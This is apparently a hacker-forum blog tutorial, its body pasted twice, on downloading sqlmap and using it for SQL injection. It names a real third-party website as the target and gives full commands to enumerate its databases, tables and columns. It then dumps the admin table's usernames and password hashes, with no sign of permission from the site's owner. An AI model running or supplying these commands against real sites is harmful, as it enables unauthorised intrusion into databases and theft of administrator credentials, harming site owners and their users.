Pranaam to all bhai ji _/\_
Today we will learn how to use SQLmap in such linux system where it doesnt installed already
penetration testing based linux os like backtrack backbox blackbunut, sqlmap comes already installed .
but you can use sqlmap on other system easily :)
how ??? ok follow these steps , its really not a big deal ;)
SQLmap official website , from where you can download sqlmap source code
http://sqlmap.org/
download link :-
https://github.com/sqlmapproject/sqlmap/zipball/master
sqlmap source code has been saved with name master
its zip file, to extract its content run command unzip master.
you will get a directory having name sqlmap project something like that, enter into that directory and list files
yesssss :) . here is our sqlmap source code .
sqlmap is coded in python and sqlmap.py is the main file which is used for performing SQL injection.
so lets start >:D<
you can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py option
./sqlmap.py option
if sqlmap.py file has execute permission, you can run sqlmap using ./
for listing available options for sqlmap usage , supply -h option
like this
./sqlmap.py -h
he is the link where you can get options
https://github.com/sqlmapproject/sqlmap/wiki/Usage
for example i want to extract database of a sql injection vulnerable website using sqlmap
website link is http://www.iapex.com.pk/messages.php?id=4
command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 --dbs
here -u stands for sql injection vulnerable url
--dbs stands for databases \ ^_^ /
as you will run this command , sqlmap will start injecting thi url and will extract databases name
after completion of process , you will get results like this
like, now you want to get list of tables in database, you will need to specify database name
./sqlmap.py -u webite.com/vulnerable.php?id=4 -D database_name --tables
in my case i am going for database having name iapexcom_new
so command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new --tables
here -D stands for , database that has to be enumerate
we have 2 databases , we can enumerate tables from these database .
in above command we are enumerating table list of database iapexcom_new
after completion of process , sqlmap will show list of tables under database
and so on :)
as we know
database has tables and every table has columns .
columns contains information/data
so performing sql injection using sqlmap,first we extract database name ,then tables list from that database
after extracting tables name , we select a table and extract list of columns in that table
and then we can get information stored in columns
lets extract columns from table of database ;)
i am going for table es_admin because this table contains columns which has username and password of website admin stored in it :P
./sqlmap.py -u website.com/vulnerable.php?id=4 -D idatabase_name -T table_name --columns
ok
query will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin --columns
meaning of this command is
inject a website url (-u) http://www.iapex.com.pk/messages.php?id=4 whose database name is iapexcom_new (-D) and table name is (-T) es_admin and extract names of columns from table
wait for few minutes untill sqlmap extract columns name from table es_admin
it will show result like this
ok now we have columns name too, lets go and extract data stored in these columns :P
command will be
./sqlmap.py -u website.com/vulnerable..php?id=4 -D database_name -T table_name -C column_name --dump
command in my case
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin -C username,password --dump
after process completion you will get result like this
you have done >:D<, and you can see username and password hash which are stored in table 'es_admin' in columns having name username and password
this is how you can use sqlmap on linux os where it is not installed already :)
enjoy
Today we will learn how to use SQLmap in such linux system where it doesnt installed already
penetration testing based linux os like backtrack backbox blackbunut, sqlmap comes already installed .
but you can use sqlmap on other system easily :)
how ??? ok follow these steps , its really not a big deal ;)
SQLmap official website , from where you can download sqlmap source code
http://sqlmap.org/
download link :-
https://github.com/sqlmapproject/sqlmap/zipball/master
sqlmap source code has been saved with name master
its zip file, to extract its content run command unzip master.
you will get a directory having name sqlmap project something like that, enter into that directory and list files
yesssss :) . here is our sqlmap source code .
sqlmap is coded in python and sqlmap.py is the main file which is used for performing SQL injection.
so lets start >:D<
you can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py option
./sqlmap.py option
if sqlmap.py file has execute permission, you can run sqlmap using ./
for listing available options for sqlmap usage , supply -h option
like this
./sqlmap.py -h
he is the link where you can get options
https://github.com/sqlmapproject/sqlmap/wiki/Usage
for example i want to extract database of a sql injection vulnerable website using sqlmap
website link is http://www.iapex.com.pk/messages.php?id=4
command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 --dbs
here -u stands for sql injection vulnerable url
--dbs stands for databases \ ^_^ /
as you will run this command , sqlmap will start injecting thi url and will extract databases name
after completion of process , you will get results like this
like, now you want to get list of tables in database, you will need to specify database name
./sqlmap.py -u webite.com/vulnerable.php?id=4 -D database_name --tables
in my case i am going for database having name iapexcom_new
so command will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new --tables
here -D stands for , database that has to be enumerate
we have 2 databases , we can enumerate tables from these database .
in above command we are enumerating table list of database iapexcom_new
after completion of process , sqlmap will show list of tables under database
and so on :)
as we know
database has tables and every table has columns .
columns contains information/data
so performing sql injection using sqlmap,first we extract database name ,then tables list from that database
after extracting tables name , we select a table and extract list of columns in that table
and then we can get information stored in columns
lets extract columns from table of database ;)
i am going for table es_admin because this table contains columns which has username and password of website admin stored in it :P
./sqlmap.py -u website.com/vulnerable.php?id=4 -D idatabase_name -T table_name --columns
ok
query will be
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin --columns
meaning of this command is
inject a website url (-u) http://www.iapex.com.pk/messages.php?id=4 whose database name is iapexcom_new (-D) and table name is (-T) es_admin and extract names of columns from table
wait for few minutes untill sqlmap extract columns name from table es_admin
it will show result like this
ok now we have columns name too, lets go and extract data stored in these columns :P
command will be
./sqlmap.py -u website.com/vulnerable..php?id=4 -D database_name -T table_name -C column_name --dump
command in my case
./sqlmap.py -u http://www.iapex.com.pk/messages.php?id=4 -D iapexcom_new -T es_admin -C username,password --dump
after process completion you will get result like this
you have done >:D<, and you can see username and password hash which are stored in table 'es_admin' in columns having name username and password
this is how you can use sqlmap on linux os where it is not installed already :)
enjoy
Thank you :)
Greetz to :- Guru ji Zero , code breaker ica, Aasim shaikh,Reborn, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya,L0rd Crus4d3r,Hackuin ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell Hardeep bhai,Mannu,Viki and AR AR bhai ji <3
0 comments